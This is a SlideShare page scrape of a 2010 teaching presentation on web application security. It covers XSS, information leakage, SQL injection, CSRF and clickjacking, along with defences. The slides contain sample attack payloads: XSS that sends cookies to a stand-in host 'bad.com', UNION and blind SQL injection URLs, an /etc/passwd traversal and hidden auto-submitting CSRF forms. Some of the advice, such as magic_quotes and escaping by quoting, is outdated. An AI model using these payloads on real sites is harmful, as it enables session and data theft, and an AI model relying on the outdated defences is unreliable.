Your SlideShare is downloading. ×
0
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Best practices of web app security (samvel gevorgyan)

4,124

Published on

Published in: Technology
1 Comment
2 Likes
Statistics
Notes
No Downloads
Views
Total Views
4,124
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
94
Comments
1
Likes
2
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide
  • “A clever person solves a problem. A wise person avoids it.”Albert Einstein
  • Transcript

    • 1. BEST PRACTICES OF<br />2010<br />WEB APPLICATION SECURITY<br />by SamvelGevorgyan<br />
    • 2. STATISTICS OF VULNERABILITIES<br />Source: ptresearch.blogspot.com/2010/06/web-application-vulnerability.html<br />
    • 3. STATISTICS OF RISK LEVELS<br />Source: ptresearch.blogspot.com/2010/06/web-application-vulnerability.html<br />
    • 4. TOP 10 HIGH LEVEL VULNERABILITIES<br />01. Cross-Site Scripting (XSS) [Symantec - 2007]<br />02. Information leakage<br />03. SQL Injection [~2005]<br />04. Cross-Site Request Forgery (CSRF) [1990s]<br />05. ClickJacking [J.Grossman and R.Hansen - 2008]<br />06. Phishing[1987, 1996]<br />07. Path Traversal or Local/Remote File Inclusion<br />08. Shell injection<br />09. Session Hijacking [early 2000s]<br />10. File uploads<br />
    • 5. CROSS-SITE SCRIPTING<br />DESCRIPTION:<br /> Cross-Site Scripting is a type of web application vulnerability when the attacker injects his executable code into the vulnerable website.<br /><ul><li>EXAMPLE:</li></ul>http://site.com/search.php?q=<script>alert(“XSS”)</script><br />
    • 6. CROSS-SITE SCRIPTING<br />TYPES:<br />Non-Persistant<br />Persistant<br />1.Non-Persistant:<br />In this type of XSS vulnerability the attacker is able to execute his own code in a website but no changes can be done in that website.<br />
    • 7. CROSS-SITE SCRIPTING<br />Non-Persistant<br />EXAMPLE:<br />http://www.site.com/viewtopic.php?id=4"><script>document.location="http://bad.com/logger.php?cookie="+document.cookie;</script><br />OR<br /> http://www.site.com/viewtopic.php?id=4”><script>document.write(“<img src=‘http://bad.com/logger.php?cookie=“+ document.cookie+”’/>”);</script><br />
    • 8. CROSS-SITE SCRIPTING<br />2.Persistant:<br />In this case attacker stores his executable script in the vulnerable website database which is being executed every time webpage is showing that data.<br />Common targets are:<br /><ul><li>Comments
    • 9. Chat messages
    • 10. E-mail messages
    • 11. Wall posts, etc.</li></li></ul><li>CROSS-SITE SCRIPTING<br />Persistant<br />EXAMPLE:<br />
    • 12. CROSS-SITE SCRIPTING<br />Persistant<br />Comment in raw format:<br />and I like the way this website developers<br />work..hahaha :D :D<br /><SCRIPT/XSS <br />SRC="http://bad.com/xss.js"><br /></SCRIPT> <br />
    • 13. CROSS-SITE SCRIPTING<br />Potentially Dangerous HTML elemets:<br />TAGS<br /><ul><li><applet>
    • 14. <body>
    • 15. <embed>
    • 16. <frame>
    • 17. <script>
    • 18. <frameset>
    • 19. <html>
    • 20. <iframe>
    • 21. <img>
    • 22. <style>
    • 23. <layer>
    • 24. <ilayer>
    • 25. <meta>
    • 26. <object> ,etc. </li></ul> ATTRIBUTES<br />src, href, lowsrc, xmlns, style, etc.<br />
    • 27. CROSS-SITE SCRIPTING<br />Potentially Dangerous HTML events:<br /><ul><li>Onblur
    • 28. Onchange
    • 29. Onclick
    • 30. Ondrag
    • 31. Onerror
    • 32. Onfocus
    • 33. Onkeypress
    • 34. Onkeyup
    • 35. Onload
    • 36. Onmouseover
    • 37. Onmousemove
    • 38. Onmove
    • 39. Onresize
    • 40. Onselectstart
    • 41. Onselect
    • 42. Onsubmit
    • 43. Onunload
    • 44. Onscroll, etc.</li></ul>*all HTML events<br />
    • 45. CROSS-SITE SCRIPTING<br />SOLUTIONS:<br /><ul><li>PHP function strip_tags()
    • 46. PHP Input Filter
    • 47. PHP libraries:
    • 48. HTML_Safe
    • 49. htmLawed
    • 50. kses
    • 51. Safe HTML Checker, etc.</li></li></ul><li>BEST SOLUTION<br />OWASP HTML Purifier:<br />SAFE<br /> HTML Purifier defeats XSS with an audited whitelist<br />CLEAN<br />HTML Purifier ensures standards-compliant output<br />OPEN<br /> HTML Purifier is open-source and highly customizable<br />
    • 52. BEST SOLUTION<br />COMPARISON:<br />Source: www.htmlpurifier.org/comparison<br />
    • 53. BEST SOLUTION<br />COMPARISON:<br />Source: www.htmlpurifier.org/comparison<br />
    • 54. INFORMATION LEAKAGE<br />DESCRIPTION:<br /> Information Leakage is an application weakness where an application reveals sensitive data, such as technical details of the web application, environment, or user-specific data.<br /><ul><li>EXAMPLE:</li></ul> Warning: include(pages/../../../../../../etc/passwd1) [function.include]: failed to open stream: No such file or directory in /usr/www/users/kint/view.php on line 20<br />
    • 55. INFORMATION LEAKAGE<br />CAUSES OF:<br />Directory listing misconfiguration<br />Unproper error handling<br />Unproper filetype handling<br />Sensitive HTML comments, etc.<br />1.Directory listing misconfiguration:<br />Leaving directory listing enabled allows the attacker to read the list of all files in a directory.<br />
    • 56. INFORMATION LEAKAGE<br />Directory listing misconfiguration<br /><ul><li>EXAMPLE:</li></ul>Index of /admin<br />
    • 57. INFORMATION LEAKAGE<br />2.Unproper error handling:<br />Because of unproper error handling all the unexpecting requests will generate error messages which will be visible to the attacker.<br /><ul><li>EXAMPLE:</li></ul> Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/aes/public_html/news/list.php on line 81<br />
    • 58. INFORMATION LEAKAGE<br />3.Unproper filetype handling:<br /> Unproper filetype handling allows your important files to be readable by the attacker.<br /><ul><li>EXAMPLE:
    • 59. sql_backup.tar.gz
    • 60. memberlist.xml
    • 61. phpinfo.html
    • 62. dbClass.inc
    • 63. Login.php.bkp</li></li></ul><li>INFORMATION LEAKAGE<br />Unproper filetype handling<br />EXAMPLE:<br /> dbClass.inc<br />…<br /> private $host = "localhost";<br /> private $usr = “root“;<br /> private $pwd = “i7kT0w“;<br /> public $db = "brav_new";<br /> public function Connect(){ … }<br />…<br />
    • 64. INFORMATION LEAKAGE<br />4.Sensitive HTML comments:<br /> Notes left by webdevelopers may content important information which will cause of the information leakage. <br /><ul><li>EXAMPLE:</li></ul><form enctype="multipart/form-data" action="upload.php" method="POST"><br /> <!--check for filetypes php, cgi, pl, bat, exe, dll, reg--><br /> <input name="upload_file" type="file" /> <br /> …<br />
    • 65. BEST SOLUTION<br />Directory listing misconfiguration<br />put a blank file named index.html in that directory.<br />put a file named .htaccess in that directory consisting of only this line:Options –indexes<br /> NOTE: all sub-directories of that directory will also get their directory listings turned off.<br />
    • 66. BEST SOLUTION<br />Unproper error handling<br />The following configurations should be done in php.ini file:<br /><ul><li>error_reporting = E_ALL
    • 67. display_errors = Off
    • 68. log_errors = On
    • 69. error_log = path/PHP_errors.log //any file in which the web server has write privileges.</li></li></ul><li>BEST SOLUTION<br />Unproper error handling<br />Create an .htaccess file in public_html directory with the following lines:<br /> php_flag display_errors off<br /> php_flag log_errors on<br /> php_value error_log path/PHP_errors.log<br /> <Files path/PHP_errors.log><br /> Order allow,deny<br /> Deny from all<br /> Satisfy All<br /> </Files<br />
    • 70. BEST SOLUTION<br />Unproper filetype handling<br />Don’t keep your important files with the following extentions in your public web directory if you don’t link to them in the website:<br /><ul><li>Compressed files(*.zip, *.rar, *.tar.gz, etc.)
    • 71. Database files(*.sql, *.cvs, *.xml, *.xls, etc.)
    • 72. Unknown files(*.inc, *.copy, *.bkp, etc.)</li></li></ul><li>BEST SOLUTION<br />Sensitive HTML comments<br />No sensetive HTML comment must be used in a website as every user will be able to view the webpage source code.<br />
    • 73. SQL INJECTION<br />DESCRIPTION:<br /> This is a type of vulnerability when attacker injects his custom SQL query to the request to get sensetive data from the database, read or write a file.<br /><ul><li>EXAMPLE:</li></ul>http://site.com/product.php?id=4+AND+1=2+UNION+SELECT+0,database(),1,2+--<br />
    • 74. SQL INJECTION<br />TYPES:<br />Normal<br />Blind<br />1.Normal:<br />In this type of SQL Injection vulnerability attacker sends a custom SQL query and gets the output in the screen.<br />
    • 75. SQL INJECTION<br />Normal SQL Injection<br /><ul><li>EXAMPLE:</li></ul> http://site.com/product.php?id=1348+AND+1=2+union+select+1,2,user(),database(),<br /> 5,version(),7+--<br />
    • 76. SQL INJECTION<br />2.Blind:<br />This type of injection is identical to normal SQL Injection except that the SQL query returns positive or negative response.<br /><ul><li>EXAMPLE:</li></ul> http://site.com/view.php?page=10+<br /> and+substring(@@version,1,1)=5+--<br />
    • 77. SQL INJECTION<br />SOLUTIONS:<br /><ul><li>PHP.ini configuration
    • 78. magic_quotes_gpc = on
    • 79. PHP functions
    • 80. filter_var()
    • 81. mysql_real_escape_string()
    • 82. sprintf()
    • 83. Put variables into the quotes(e.g: ‘$id’)
    • 84. Assign min privilages for mysql users</li></li></ul><li>BEST SOLUTION<br />GreenSQL open source database firewall:<br />Activity monitoring and audit<br />User rights management<br />Real-time database protection<br />Intrusion preventation(IPS)<br />Database caching<br />Encrypted comunication over SSL<br />Virtual patching<br />Reporting<br />
    • 85. BEST SOLUTION<br />GreenSQL open source database firewall:<br />
    • 86. CROSS-SITE REQUEST FORGERY<br />DESCRIPTION:<br /> This vulnerability of web application allows attacker’s website to manipulate its actions using authorized user’s session.<br /><ul><li>EXAMPLE:</li></ul> <img src=“http://site.com/share.php?url=http://bad.com” style=“display:none” /> <br />
    • 87. CROSS-SITE REQUEST FORGERY<br />EXAMPLE:<br /><div style=“display:none”><br /> <iframe name=“hidden”></iframe><br /> <form name=“Form” action= “http://site.com/post.php” target=“hidden” method=“POST”><br /> <input type=“text” name=“message” value=“I like www.bad.com” /><br /> <input type=“submit” /><br /> </form><br /> <script>document.Form.submit();</script><br /> </div><br />
    • 88. CROSS-SITE REQUEST FORGERY<br />USELESS DEFENSES:<br /><ul><li>Only accept POST</li></ul>Stops simple link-based attacks (IMG, frames, etc.)<br />But hidden POST requests can be created with frames, scripts, etc.<br /><ul><li> Referer checking</li></ul>Some users prohibit referers, so you can’t just require referer headers<br />Techniques to selectively create HTTP request without referers exist<br /><ul><li>Requiring multi-step transactions</li></ul>CSRF attack can perform each step in order<br />
    • 89. CROSS-SITE REQUEST FORGERY<br />SOLUTIONS:<br /><ul><li> CAPTHCAs</li></ul>This is a type of challenge-response test used in computing to ensure that the response is not generated by a computer.<br /><ul><li> One-time tokens</li></ul>Unlike the CAPTCHA’s system this is a unique number stored in the form field and in session to compare them after submiting the form.<br />
    • 90. BEST SOLUTION<br />Business Processing<br />Add Tokento HTML<br />OWASPCSRFGuard<br />Verify Token<br />OWASP CSRFGuard<br /><ul><li>Adds token to:
    • 91. href attribute
    • 92. src attribute
    • 93. hidden field in all forms
    • 94. Actions:
    • 95. Log
    • 96. Invalidate
    • 97. Redirect</li></ul>User<br />(Browser)<br />1. Add token with regex<br />2. Add token with HTML parser<br />3. Add token in browser with Javascript<br />Source: www.owasp.org/index.php/CSRFGuard <br />
    • 98. CLICK-JACKING<br />DESCRIPTION:<br /> This is the advanced version of Cross-Site Request Forgery. It uses all the flexibility of front-end languages to bypass protected forms and send a request using victim’s active session.<br /><ul><li>EXAMPLE:</li></ul> <div style="position:fixed; width:100%; height:100%; z-index:999;" onclick="alert(‘ClickJacked');"></div><br />
    • 99. CLICK-JACKING<br />EXAMPLE:<br />
    • 100. BEST SOLUTION<br /><ul><li>FrameKiller(frame busting):</li></ul> <style> html{ display : none; }</style> <script>if( self == top ) { document.documentElement.style.display = 'block' ; } else { top.location = self.location; }<br /> </script><br /><ul><li>OWASP CSRFGuard</li></li></ul><li>THANK YOU!!<br />SPECIAL THANKS FOR KIND SUPPORT:<br /><ul><li>MANU ZACHARIA</li></ul> MVP (Enterprise Security), ISLA-2010 (ISC)², C|EH, C|HFI, CCNA, MCP, AFCEH<br /> Certified ISO 27001:2005 LA<br /><ul><li>C-DAC ACTS</li></ul> Advanced Computing Training School<br />

    ×